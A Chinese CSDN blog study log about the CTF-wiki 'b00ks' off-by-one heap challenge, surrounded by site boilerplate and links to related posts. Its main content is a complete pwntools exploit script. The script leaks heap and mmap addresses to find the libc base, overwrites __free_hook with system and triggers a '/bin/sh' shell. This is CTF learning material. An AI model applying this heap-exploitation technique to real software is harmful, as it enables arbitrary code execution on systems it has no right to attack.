2020-11-10学习记录

最新推荐文章于 2022-07-03 12:50:28 发布
最新推荐文章于 2022-07-03 12:50:28 发布
阅读量121 收藏
点赞数 1
分类专栏: Pwn 学习经历 做题记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/eeeeeight/article/details/109611038
版权
学习经历 同时被 3 个专栏收录
83 篇文章 3 订阅
订阅专栏
Pwn
32 篇文章 0 订阅
订阅专栏
做题记录
19 篇文章 0 订阅
订阅专栏

CTFwiki上关于one by off的例题

 还是有些疑惑的,主要是所谓的mmap地址

#!/usr/bin/env python
# coding=utf-8
from pwn import *
sh=process('./b00ks')
elf=ELF('./b00ks')
libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
                                                                                                                      
def add(size_n,name,size_d,description):
    sh.recvuntil('> ')
    sh.sendline('1')
    sh.recv()
    sh.sendline(str(size_n))
    sh.recv()
    sh.sendline(name)
    sh.recv()
    sh.sendline(str(size_d))
    sh.recv()
    sh.sendline(description)

def delete(index):
    sh.recvuntil('> ')
    sh.sendline('2')
    sh.recv()
    sh.sendline(str(index))

def edit(index,description):
    sh.recvuntil('> ')
    sh.sendline('3')
    sh.recv()
    sh.sendline(str(index))
    sh.recv()
    sh.sendline(description)


def show():
    sh.recvuntil('> ')
    sh.sendline('4')

def rename(name):
    sh.recvuntil('> ')
    sh.sendline('5')
    sh.recv()
    sh.sendline(name)

def exit():
    sh.recvuntil('> ')
    sh.sendline('6')

sh.recv()
sh.sendline('a'*32)
add(128,'w'*127,128,'A'*0x50+p64(0)+p64(0x11)+p64(0)*2+'A'*15)
show()
sh.recvuntil('a'*32)
book1_addr=u64(sh.recvuntil('\n').split()[0].ljust(8,'\x00'))
print 'book1 addr is '+hex(book1_addr)

add(0x21000,'W'*(0x21000-1),0x21000,'V'*(0x21000-1))
payload='A'*0x50+p64(1)+p64(book1_addr+0x30+0x8)+p64(book1_addr+0x30+0x8)+p64(0x200)+'A'*0x10
edit(1,payload)
rename('a'*32)
show()
sh.recvuntil('Name: ')
book2_name_ptr=u64(sh.recvuntil('\n').split()[0].ljust(8,'\x00'))
print 'book2_name_ptr is '+hex(book2_name_ptr)

mmap_addr=0x7ffff7b0e740
mmap_addr=0x7ffff7fb7010
libcbase=book2_name_ptr-(mmap_addr-0x7ffff7a0d000)+0x1000
sys_addr=libcbase+libc.sym['system']
free_hook_addr=libcbase+libc.sym['__free_hook']
bin_sh_addr=libcbase+libc.search('/bin/sh').next()
print 'libcbase is '+hex(libcbase)

edit(1,p64(bin_sh_addr)+p64(free_hook_addr))
#gdb.attach(sh)
print '1' 
edit(2,p64(sys_addr))
print '2' 
print hex(bin_sh_addr)
print hex(free_hook_addr)
print hex(sys_addr)
gdb.attach(sh)
delete(2)
sh.interactive()
#x/20gx 0x555555756040
#x/100gx 0x555555757410  
#20 4000
北岛静石
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
2020-4-27 深度学习 汇总
weixin_42555985的博客
04-27 558
第一章 引言introduction 2020-1-23 深度学习笔记1-引言 中文 英文 第二章 线性代数linear algebra 2020-1-24 深度学习笔记2 - 线性代数 中文 英文 第三章 概率与信息论Probability and Information Theory 2020-1-25 深度学习笔记3 - 概率与信息论 中文 英文 ...
2020-10-30
团子窝
10-30 113
学习目标: 提示:这里可以添加学习目标 例如:一周掌握 Java 入门知识 学习内容: 提示:这里可以添加要学的内容 例如: 1、 搭建 Java 开发环境 2、 掌握 Java 基本语法 3、 掌握条件语句 4、 掌握循环语句 学习时间: 提示:这里可以添加计划学习的时间 例如: 1、 周一至周五晚上 7 点—晚上9点 2、 周六上午 9 点-上午 11 点 3、 周日下午 3 点-下午 6 点 学习产出: 提示:这里统计学习计划的总量 例如: 1、 技术笔记 2 遍 2、CSDN 技术博客
2020-10-11-12~2021-01 学习目标
qq_24816993的博客
10-13 88
学习目标: (初级以上)运维工程师 学习内容: 运维基础知识 1、 Linux基础知识(包含shell脚本) 2、 Java初级开发 3、 Python开发 学习时间: 因其他原因,无法抽出大量空闲时间进行学习,尽可能利用闲暇时间学习 1、 周一至周五 每天三个小时,早中晚各一个小时 2、 周六 三到四个小时之间 3、 周日 五个小时 每周学习产出: 笔记,实践练习 1、 技术学习笔记 2 遍 2、CSDN 技术博客 3 篇 3、 学习的 vlog 视频 1 个(可选) ...
记录开始 2020-10-25
weixin_51938762的博客
10-25 58
学习目标: 一周掌握 计算机基础 学习内容: 1、 计算机基础知识 2、 windows操作系统 3、 word文字处理 4、 Excel电子表格 5、PowerPoint演示文档 6、计算机网络基础 7、多媒体技术基础 学习时间: 空闲时间 学习产出: 1、 技术笔记 N 遍 2、CSDN 技术博客 N 篇 ...
学习笔记2020-10-11
weixin_42877913的博客
10-11 57
2020-11-10
qq_35030360的博客
11-10 35
Jeecg-Boot前后端学习笔记 前端学习笔记 后端学习笔记
2020-10-11
ming1250的博客
10-11 30
我的学习笔记 今天学习了shell脚本,感觉挺难的·
Weblogic 管理控制台未授权远程命令执行漏洞(CVE-2020-14882,CVE-2020-14883)
07-03 1290
近年来 Oracle 官方接连披露了多款旗下产品的安全漏洞,其中包括几个较为严重的漏洞(CVE-2020-14882,CVE-2020-14883,CVE-2020-17530,CVE-2021-44228)未经身份验证的攻击者可通过HTTP、IIOP、T3协议发送构造好的恶意请求实现远程代码执行,风险较高。工作中极少涉足安全领域,所以对此知之甚少,本周机缘巧合下接触到了上述漏洞,本着学习的态度,利用周未时间深入的...
2020-11-25
qq_50920270的博客
11-25 317
内联连 关键词: inner join…on 格式: 表1 inner join 表2 on 表1.列 = 表2.列 1 左外连接 关键词: left join…on 格式: 表1 left join 表2 on 表1.列 = 表2.列 1 右外连接 关键词: right join…on 格式: 表1 right join 表2 on 表1.列 = 表2.列 1 点赞 评论 分享 收藏 打赏 举报 关注 一键三连 点赞Mark关注该博主, 随时了解TA的最新博文 2020-05-11 weixin
2020-11-20
qq_43990357的博客
11-20 4509
(一)黑马vue快速入门自学笔记 02.vue基础-简介 1.javascript框架 2.简化Dom操作 3.响应式数据驱动` 03.vue基础-第一个vue程序 1.文档传送门:https://cn.vuejs.org 2.步骤 (1)导入开发版本的vue.js; (2)创建Vue实例对象,设置el属性和data属性; (3)使用简洁的模板语法把数据渲染到页面上 <body> <div id="app"> {{message}} </div
2020-11-otus-spring-yakimov
03-29
标题“2020-11-otus-spring-yakimov”表明这是一个关于Spring框架的课程或项目,可能由名为Yakimov Pavel Pavlovich的开发者在202011月创建。这暗示我们将深入探讨Spring框架的各种方面,包括但不限于依赖注入、...
2020-11-otus-spring-akbashev
02-16
这个资料包很可能包含了Akbashev教授讲解的课程笔记、代码示例、练习和可能的项目,帮助学习者深入理解Spring框架并掌握其实际应用。通过研究其中的“2020-11-otus-spring-akbashev-main”文件,你可以获得关于上述...
2020-SLAM-Summer-School-slides.zip
09-17
这个2020-SLAM-Summer-School-slides.zip压缩包文件包含的是第三届SLAM暑期学校的一系列课程材料,旨在帮助学习者深入理解SLAM的基本原理、算法及其在实际应用中的挑战。以下将对SLAM及相关知识点进行详细阐述。 1....
Draft 2020-10-21 11:51:02-数据集
03-04
标题中的“Draft 2020-10-21 11:51:02-数据集”表明这是一个草稿版的数据集,可能是一个正在进行的工作或研究项目的一部分,创建于202010月21日11时51分2秒。这提示我们,数据集可能处于不断更新和完善的状态。 ...
Draft 2020-10-21 11:52:38-数据集
03-04
"Draft 2020-10-21 11:52:38-数据集"这个标题表明这可能是一个正在起草或更新的数据集,其创建时间是202010月21日的11点52分38秒。这样的命名方式通常用于版本控制,以便跟踪数据集的不同版本和修改历史。 描述中...
2021羊城杯pwn部分wp
eeeeeight的博客
09-12 6482
前言: 羊城杯的how2heap没做出来, rctf也爆零了, 哎, 颓了 BabyRop: 最基础的栈溢出rop链, 直接贴exp了: from pwn import * #p=process('./BabyRop') p=remote('192.168.41.23', 11000) context.log_level='debug' sh=0x804c029 system=0x80490a0 #gdb.attach(p,'b *0x804926a') p.sendline('a'*0x28+'b'*
2021长城杯pwn部分wp
eeeeeight的博客
09-19 6012
前言: 就, 除了vmpwn都是基础glibc的heap题 king_in_heap_1: delete函数没有把free后的指针置零, 存在uaf, 然后用unsortedbin的fd指向io结构体泄露libc, 然后mallochook上用realloc调整一下, 打onegadget就完事了 #!/usr/bin/env python # coding=utf-8 from pwn import * sh=remote('47.104.175.110',20066) #sh=process('./ki
2021鹤城杯pwn部分wp
eeeeeight的博客
10-09 2071
littleof 白给的ret2libc, 第一个输出泄露canary, 第二个输出泄露libc基址顺便控制一下返回地址再返回去输入, 之后就getshell咯(摊手) #!/usr/bin/env python #coding=utf-8 from pwn import* sh = remote("182.116.62.85", 27056) #sh = process('./littleof') elf = ELF('./littleof') libc = ELF('./libc-2.27.so')
Nov 26, 21在macOS 12.0.1上布置pwn环境
eeeeeight的博客
11-27 1742
前言: 不是让民那桑在mac上做amd架构的题目,我布置环境是为了以后方便pwn arm架构的题目/设备之类的(逃) Pwn environment: lldb && voltron && tmuxinator && pwntools: Because outstanding performance of Plugins in gdb like pwndbg, gef and so on. I choose to install gdb on my M1 Ma
UVM IEEE 1800-2020中文翻译版:加速验证学习与互操作性提升
"UVM-IEEE-STD-1800-2020 deepl机翻中文版,可对照原版UVM标准快速学习。这是一个关于IEEE 1800.2-2020标准的中文翻译版本,用于帮助理解和应用通用验证方法学(UVM),特别适用于软件/插件开发、SystemVerilog验证...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值